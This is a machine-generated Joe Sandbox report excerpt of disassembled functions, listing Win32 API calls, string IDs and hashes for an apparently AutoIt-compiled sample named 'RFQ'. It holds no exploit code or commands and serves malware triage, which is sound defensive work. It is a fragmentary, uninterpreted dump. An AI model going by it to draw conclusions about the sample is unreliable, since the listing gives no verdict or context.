                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                                            • API String ID: 2211948467-2373415609
                                                                            • Opcode ID: ea8057338881d26c6252720417115019d55d6d8e7054f932b2fd2e0476abe0ef
                                                                            • Instruction ID: 88c67b3c784613b208cdce8436da6a4761cbc622a45d61949a0f9539cd6028e8
                                                                            • Opcode Fuzzy Hash: ea8057338881d26c6252720417115019d55d6d8e7054f932b2fd2e0476abe0ef
                                                                            • Instruction Fuzzy Hash: 21026E71540214EFDB15DFA8CC8DEAE7BB9EB48710F108258F915AB2E1DB78AD01CB64
                                                                            APIs
                                                                            • SetTextColor.GDI32(?,00000000), ref: 00716FFE
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 0071702F
                                                                            • GetSysColor.USER32(0000000F), ref: 0071703B
                                                                            • SetBkColor.GDI32(?,000000FF), ref: 00717055
                                                                            • SelectObject.GDI32(?,?), ref: 00717064
                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 0071708F
                                                                            • GetSysColor.USER32(00000010), ref: 00717097
                                                                            • CreateSolidBrush.GDI32(00000000), ref: 0071709E
                                                                            • FrameRect.USER32(?,?,00000000), ref: 007170AD
                                                                            • DeleteObject.GDI32(00000000), ref: 007170B4
                                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 007170FF
                                                                            • FillRect.USER32(?,?,?), ref: 00717131
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00717153
                                                                              • Part of subcall function 007172B7: GetSysColor.USER32(00000012), ref: 007172F0
                                                                              • Part of subcall function 007172B7: SetTextColor.GDI32(?,?), ref: 007172F4
                                                                              • Part of subcall function 007172B7: GetSysColorBrush.USER32(0000000F), ref: 0071730A
                                                                              • Part of subcall function 007172B7: GetSysColor.USER32(0000000F), ref: 00717315
                                                                              • Part of subcall function 007172B7: GetSysColor.USER32(00000011), ref: 00717332
                                                                              • Part of subcall function 007172B7: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00717340
                                                                              • Part of subcall function 007172B7: SelectObject.GDI32(?,00000000), ref: 00717351
                                                                              • Part of subcall function 007172B7: SetBkColor.GDI32(?,00000000), ref: 0071735A
                                                                              • Part of subcall function 007172B7: SelectObject.GDI32(?,?), ref: 00717367
                                                                              • Part of subcall function 007172B7: InflateRect.USER32(?,000000FF,000000FF), ref: 00717386
                                                                              • Part of subcall function 007172B7: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0071739D
                                                                              • Part of subcall function 007172B7: GetWindowLongW.USER32(00000000,000000F0), ref: 007173AA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                            • String ID:
                                                                            • API String ID: 4124339563-0
                                                                            • Opcode ID: e1ad8568f0a6185ef91c0213b71194b4f4af27e25bb14a741ae9ca3134addc20
                                                                            • Instruction ID: f88c4bc2f0641854b77842a816a46d231b4a5a172dc08e4f32404fec8b603aca
                                                                            • Opcode Fuzzy Hash: e1ad8568f0a6185ef91c0213b71194b4f4af27e25bb14a741ae9ca3134addc20
                                                                            • Instruction Fuzzy Hash: 10A1B272048305FFD7119FA8DC48A9B7BBAFF88320F208A19F952961E1D738D944DB55
                                                                            APIs
                                                                            • DestroyWindow.USER32(?,?), ref: 0069A389
                                                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 006D7518
                                                                            • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 006D7551
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 006D7996
                                                                              • Part of subcall function 0069A4D7: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0069A15D,?,00000000,?,?,?,?,0069A12F,00000000,?), ref: 0069A53A
                                                                            • SendMessageW.USER32(?,00001053), ref: 006D79D2
                                                                            • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 006D79E9
                                                                            • ImageList_Destroy.COMCTL32(00000000,?), ref: 006D79FF
                                                                            • ImageList_Destroy.COMCTL32(00000000,?), ref: 006D7A0A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                            • String ID: 0
                                                                            • API String ID: 2760611726-4108050209
                                                                            • Opcode ID: 683620ba0226d407f634439b7b7ef5950bd81390f262f0d90f7c2eb4662b4380
                                                                            • Instruction ID: 3a24cd50a1d15ab43128f5f40d8ee554faa86dd7d5e2c320cc18afd4ee599baa
                                                                            • Opcode Fuzzy Hash: 683620ba0226d407f634439b7b7ef5950bd81390f262f0d90f7c2eb4662b4380
                                                                            • Instruction Fuzzy Hash: 2E12BB30908251DFCB21CF68C898BE9BBE7BB44301F54846AE495CB761E735ED42CB96
                                                                            APIs
                                                                            • DestroyWindow.USER32(00000000), ref: 00702665
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00702791
                                                                            • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 007027D0
                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 007027E0
                                                                            • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00702827
                                                                            • GetClientRect.USER32(00000000,?), ref: 00702833
                                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 0070287C
                                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0070288B
                                                                            • GetStockObject.GDI32(00000011), ref: 0070289B
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0070289F
                                                                            • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 007028AF
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007028B8
                                                                            • DeleteDC.GDI32(00000000), ref: 007028C1
                                                                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 007028ED
                                                                            • SendMessageW.USER32(00000030,00000000,00000001), ref: 00702904
                                                                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00702944
                                                                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00702958
                                                                            • SendMessageW.USER32(00000404,00000001,00000000), ref: 00702969
                                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 0070299E
                                                                            • GetStockObject.GDI32(00000011), ref: 007029A9
                                                                            • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 007029B4
                                                                            • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 007029BE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                            • API String ID: 2910397461-517079104
                                                                            • Opcode ID: d2fd6d3161c9f61b2530586a832a3afd6b1470ce5489190ba03093cf3bcfa93c
                                                                            • Instruction ID: 6985eab585594275a873a573b19db08a86bec49920460ab60a70428713c8fe61
                                                                            • Opcode Fuzzy Hash: d2fd6d3161c9f61b2530586a832a3afd6b1470ce5489190ba03093cf3bcfa93c
                                                                            • Instruction Fuzzy Hash: E3B162B1A40215AFDB14DFA8CC49FAE77B9EB09711F408254FA14E72D1D7B8AD40CB64
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 006F4A0B
                                                                            • GetDriveTypeW.KERNEL32(?,0071D034,?,\\.\,0071D0D0), ref: 006F4AE8
                                                                            • SetErrorMode.KERNEL32(00000000,0071D034,?,\\.\,0071D0D0), ref: 006F4C54
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$DriveType
                                                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                            • API String ID: 2907320926-4222207086
                                                                            • Opcode ID: 394d0b5c67992fdfdef1c68d0808f2d8abcee79a8986d1527b38923361af5a12
                                                                            • Instruction ID: 0489d6759a8c6ad8a0a952b90cffa785eb77896300bdf27a9b69a9d912971a08
                                                                            • Opcode Fuzzy Hash: 394d0b5c67992fdfdef1c68d0808f2d8abcee79a8986d1527b38923361af5a12
                                                                            • Instruction Fuzzy Hash: FA61F6B0B4520D9FCB04DF18CA419BB77A3EB45300B206119E606EB796DFB5DD82CB52
                                                                            APIs
                                                                            • GetSysColor.USER32(00000012), ref: 007172F0
                                                                            • SetTextColor.GDI32(?,?), ref: 007172F4
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 0071730A
                                                                            • GetSysColor.USER32(0000000F), ref: 00717315
                                                                            • CreateSolidBrush.GDI32(?), ref: 0071731A
                                                                            • GetSysColor.USER32(00000011), ref: 00717332
                                                                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00717340
                                                                            • SelectObject.GDI32(?,00000000), ref: 00717351
                                                                            • SetBkColor.GDI32(?,00000000), ref: 0071735A
                                                                            • SelectObject.GDI32(?,?), ref: 00717367
                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 00717386
                                                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0071739D
                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 007173AA
                                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 007173F9
                                                                            • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00717423
                                                                            • InflateRect.USER32(?,000000FD,000000FD), ref: 00717441
                                                                            • DrawFocusRect.USER32(?,?), ref: 0071744C
                                                                            • GetSysColor.USER32(00000011), ref: 0071745D
                                                                            • SetTextColor.GDI32(?,00000000), ref: 00717465
                                                                            • DrawTextW.USER32(?,00716FC4,000000FF,?,00000000), ref: 00717477
                                                                            • SelectObject.GDI32(?,?), ref: 0071748E
                                                                            • DeleteObject.GDI32(?), ref: 00717499
                                                                            • SelectObject.GDI32(?,?), ref: 0071749F
                                                                            • DeleteObject.GDI32(?), ref: 007174A4
                                                                            • SetTextColor.GDI32(?,?), ref: 007174AA
                                                                            • SetBkColor.GDI32(?,?), ref: 007174B4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
Similarity
• API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
• String ID:
• API String ID: 1996641542-0
• Opcode ID: 8111f0b5a20b5d4576ca8ac24ec33e1411b5d378594d333e9521454ed3c5ca7d
• Instruction ID: b6fe0a874d80ae06a53d61afb1ffbcf34cd5aba3701ae70f88d88a712a84477a
• Opcode Fuzzy Hash: 8111f0b5a20b5d4576ca8ac24ec33e1411b5d378594d333e9521454ed3c5ca7d
• Instruction Fuzzy Hash: 4A616E72940218BFDF159FA8DC49EEE7BB9EB08320F218115F911AB2E1D7789940DB94
APIs
• GetCursorPos.USER32(?), ref: 0071105B
• GetDesktopWindow.USER32 ref: 00711070
• GetWindowRect.USER32(00000000), ref: 00711077
• GetWindowLongW.USER32(?,000000F0), ref: 007110CC
• DestroyWindow.USER32(?), ref: 007110EC
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00711120
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0071113E
• SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00711150
• SendMessageW.USER32(00000000,00000421,?,?), ref: 00711165
• SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00711178
• IsWindowVisible.USER32(00000000), ref: 007111D4
• SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 007111EF
• SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00711203
• GetWindowRect.USER32(00000000,?), ref: 0071121B
• MonitorFromPoint.USER32(?,?,00000002), ref: 00711241
• GetMonitorInfoW.USER32(00000000,?), ref: 0071125B
• CopyRect.USER32(?,?), ref: 00711272
• SendMessageW.USER32(00000000,00000412,00000000), ref: 007112DD
Strings
Similarity
• API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
• String ID: ($0$tooltips_class32
• API String ID: 698492251-4156429822
• Opcode ID: e19c6626769a0e36d6fcd4ba2d69992fceb28d12714236f9bb5bcce0d3770429
• Instruction ID: 5396ba52ced4797eeb25173f530a80e77e64aea92dd13b153265e48e25d66d8e
• Opcode Fuzzy Hash: e19c6626769a0e36d6fcd4ba2d69992fceb28d12714236f9bb5bcce0d3770429
• Instruction Fuzzy Hash: B4B1C071604341AFD710DF68C885BABBBE5FF88710F408A1CF6899B291C775D885CBA6
APIs
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0069E8FC
• GetSystemMetrics.USER32(00000007), ref: 0069E904
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0069E92F
• GetSystemMetrics.USER32(00000008), ref: 0069E937
• GetSystemMetrics.USER32(00000004), ref: 0069E95C
• SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0069E979
• AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 0069E989
• CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0069E9BC
• SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0069E9D0
• GetClientRect.USER32(00000000,000000FF), ref: 0069E9EE
• GetStockObject.GDI32(00000011), ref: 0069EA0A
• SendMessageW.USER32(00000000,00000030,00000000), ref: 0069EA15
  • Part of subcall function 0069EA9A: GetCursorPos.USER32(?), ref: 0069EAAE
  • Part of subcall function 0069EA9A: ScreenToClient.USER32(?,?), ref: 0069EACB
  • Part of subcall function 0069EA9A: GetAsyncKeyState.USER32(00000001), ref: 0069EB02
  • Part of subcall function 0069EA9A: GetAsyncKeyState.USER32(00000002), ref: 0069EB1C
• SetTimer.USER32(00000000,00000000,00000028,0069A671), ref: 0069EA3C
Strings
Similarity
• API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
• String ID: AutoIt v3 GUI
• API String ID: 1458621304-248962490
• Opcode ID: 02dc772c6a8b955c53030a990b8f1eb8af8f5f3dd6d9db9735f337354567353f
• Instruction ID: 852bbde357012b113f6b46cd8602fc191710598771cea24b80c6eca843061a48
• Opcode Fuzzy Hash: 02dc772c6a8b955c53030a990b8f1eb8af8f5f3dd6d9db9735f337354567353f
• Instruction Fuzzy Hash: 78B15B71A402099FDF14DFA8CC45BEE7BB6FB48711F10822AFA15AB2D0D779A841CB54
APIs
  • Part of subcall function 006E103D: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 006E1058
  • Part of subcall function 006E103D: GetLastError.KERNEL32(?,00000000,00000000,?,?,006E0ADF,?,?,?), ref: 006E1064
  • Part of subcall function 006E103D: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,006E0ADF,?,?,?), ref: 006E1073
  • Part of subcall function 006E103D: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,006E0ADF,?,?,?), ref: 006E107A
  • Part of subcall function 006E103D: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 006E1091
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 006E0D39
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 006E0D6D
• GetLengthSid.ADVAPI32(?), ref: 006E0D84
• GetAce.ADVAPI32(?,00000000,?), ref: 006E0DBE
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 006E0DDA
• GetLengthSid.ADVAPI32(?), ref: 006E0DF1
• GetProcessHeap.KERNEL32(00000008,00000008), ref: 006E0DF9
• HeapAlloc.KERNEL32(00000000), ref: 006E0E00
• GetLengthSid.ADVAPI32(?,00000008,?), ref: 006E0E21
• CopySid.ADVAPI32(00000000), ref: 006E0E28
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 006E0E57
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 006E0E79
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 006E0E8B
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 006E0EB2
• HeapFree.KERNEL32(00000000), ref: 006E0EB9
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 006E0EC2
• HeapFree.KERNEL32(00000000), ref: 006E0EC9
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 006E0ED2
• HeapFree.KERNEL32(00000000), ref: 006E0ED9
• GetProcessHeap.KERNEL32(00000000,?), ref: 006E0EE5
• HeapFree.KERNEL32(00000000), ref: 006E0EEC
  • Part of subcall function 006E10D7: GetProcessHeap.KERNEL32(00000008,006E0AF5,?,00000000,?,006E0AF5,?), ref: 006E10E5
  • Part of subcall function 006E10D7: HeapAlloc.KERNEL32(00000000,?,00000000,?,006E0AF5,?), ref: 006E10EC
  • Part of subcall function 006E10D7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,006E0AF5,?), ref: 006E10FB
Similarity
• API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
• String ID:
• API String ID: 4175595110-0
• Opcode ID: f098058f3a49036c35e8267ad4725c56b19633d7f9b3fac33724f0dba5fb259f
• Instruction ID: 6e0972d28b4a9de2cecf3a575e00bd452c0199ab138d3b8b3caed3cf15b4c9d4
• Opcode Fuzzy Hash: f098058f3a49036c35e8267ad4725c56b19633d7f9b3fac33724f0dba5fb259f
• Instruction Fuzzy Hash: DC71AD71901349AFEF11DFA5DC45FEEBBBABF08300F148565E914E6290D7749A81CB60
APIs
• _wcslen.LIBCMT ref: 0071824C
• _wcslen.LIBCMT ref: 00718260
• _wcslen.LIBCMT ref: 00718283
• _wcslen.LIBCMT ref: 007182A6
• LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 007182E4
• LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,0071354D,?), ref: 00718340
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00718379
• LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 007183BC
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007183F3
• FreeLibrary.KERNEL32(?), ref: 007183FF
• ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0071840F
• DestroyIcon.USER32(?), ref: 0071841E
• SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0071843B
• SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00718447
Strings
Similarity
• API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
• String ID: .dll$.exe$.icl$M5q
• API String ID: 799131459-3388446914
• Opcode ID: f3cf95ceb7a33bcd14e4a257a3b9c8481a79dbc4ef047a765cead17d2d681cce
• Instruction ID: 00a6b16be16309a4f67a8c2ad2079bafd14d0f723470f3714672318640aba9fc
• Opcode Fuzzy Hash: f3cf95ceb7a33bcd14e4a257a3b9c8481a79dbc4ef047a765cead17d2d681cce
• Instruction Fuzzy Hash: 2161E0B1540215BEEB55DFA8CC85BFE77A9BF08B10F108209F915D60C1DFB8A990CBA5
APIs
• CharUpperBuffW.USER32(?,?), ref: 007108F9
• _wcslen.LIBCMT ref: 00710934
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00710987
• _wcslen.LIBCMT ref: 007109BD
• _wcslen.LIBCMT ref: 00710A39
• _wcslen.LIBCMT ref: 00710AB4
  • Part of subcall function 00683536: _wcslen.LIBCMT ref: 00683541
  • Part of subcall function 006E2B2C: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 006E2B3E
Strings
Similarity
• API ID: _wcslen$MessageSend$BuffCharUpper
• String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
• API String ID: 1103490817-4258414348
• Opcode ID: 59ed621ab0a32d7d985d019f6a8c6e2519a645202f96a649d0c90abf91adb44a
• Instruction ID: 3d44828d378ed0e1d24759e99fa582f6f7ba8499ab70f58b31b2599570a60a8b
• Opcode Fuzzy Hash: 59ed621ab0a32d7d985d019f6a8c6e2519a645202f96a649d0c90abf91adb44a
• Instruction Fuzzy Hash: 0FE1B0712083418FC714EF28C4908AAB7E2FF94314B508A5DF8959B3A2DB78ED85CBD5
APIs
Strings
Similarity
• API ID: _wcslen$BuffCharUpper
• String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
• API String ID: 1256254125-909552448
• Opcode ID: 6298f9a9cbbff0a142f3f56a72f0abaf42d6811b27f18417ebfccf28149bce27
• Instruction ID: 29346b875926ac67ee25258662764bc141377564f5d3194b5812490edc118540
• Opcode Fuzzy Hash: 6298f9a9cbbff0a142f3f56a72f0abaf42d6811b27f18417ebfccf28149bce27
• Instruction Fuzzy Hash: C4711272A1416ACBCB22EF7CCD415BA33D2AF61764B554329E8619B2D4EB7CDD40C3A0
Strings
Similarity
• API ID:
• String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
• API String ID: 0-1645009161
• Opcode ID: 74a2363b2ec4e814bf64e71d956ee4397630bfcdc64baa00f692e8cf88d57217
• Instruction ID: 87d307733d74f82708d391473e4c9665c289656f475fbdea74518af35e250775
• Opcode Fuzzy Hash: 74a2363b2ec4e814bf64e71d956ee4397630bfcdc64baa00f692e8cf88d57217
• Instruction Fuzzy Hash: 6C81D5B1600605BACB61BF64DC56FFA376AEF05340F084128F9069B691EB74EA81CB65
APIs
• LoadIconW.USER32(00000063), ref: 006E5984
• SendMessageW.USER32(?,00000080,00000000,00000000), ref: 006E5996
• SetWindowTextW.USER32(?,?), ref: 006E59AD
• GetDlgItem.USER32(?,000003EA), ref: 006E59C2
• SetWindowTextW.USER32(00000000,?), ref: 006E59C8
• GetDlgItem.USER32(?,000003E9), ref: 006E59D8
• SetWindowTextW.USER32(00000000,?), ref: 006E59DE
• SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 006E59FF
• SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 006E5A19
• GetWindowRect.USER32(?,?), ref: 006E5A22
• _wcslen.LIBCMT ref: 006E5A89
• SetWindowTextW.USER32(?,?), ref: 006E5AC5
• GetDesktopWindow.USER32 ref: 006E5ACB
                                                                            • GetWindowRect.USER32(00000000), ref: 006E5AD2
                                                                            • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 006E5B29
                                                                            • GetClientRect.USER32(?,?), ref: 006E5B36
                                                                            • PostMessageW.USER32(?,00000005,00000000,?), ref: 006E5B5B
                                                                            • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 006E5B85
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                            • String ID:
                                                                            • API String ID: 895679908-0
                                                                            • Opcode ID: bb70bef758ee5e16e21f189aef49dde48b2de875a27de22ab0b0bb470e7e169e
                                                                            • Instruction ID: 6f8aabe6754974c4f4530dc37bc231419ce37399ffa1128a95b30abc03fefb87
                                                                            • Opcode Fuzzy Hash: bb70bef758ee5e16e21f189aef49dde48b2de875a27de22ab0b0bb470e7e169e
                                                                            • Instruction Fuzzy Hash: AA717F31901B49DFDB21DFA9CD85AAEBBF6FF48708F104528E143A26A0D774E944CB54
                                                                            APIs
                                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 006FFD4E
                                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 006FFD59
                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 006FFD64
                                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 006FFD6F
                                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 006FFD7A
                                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 006FFD85
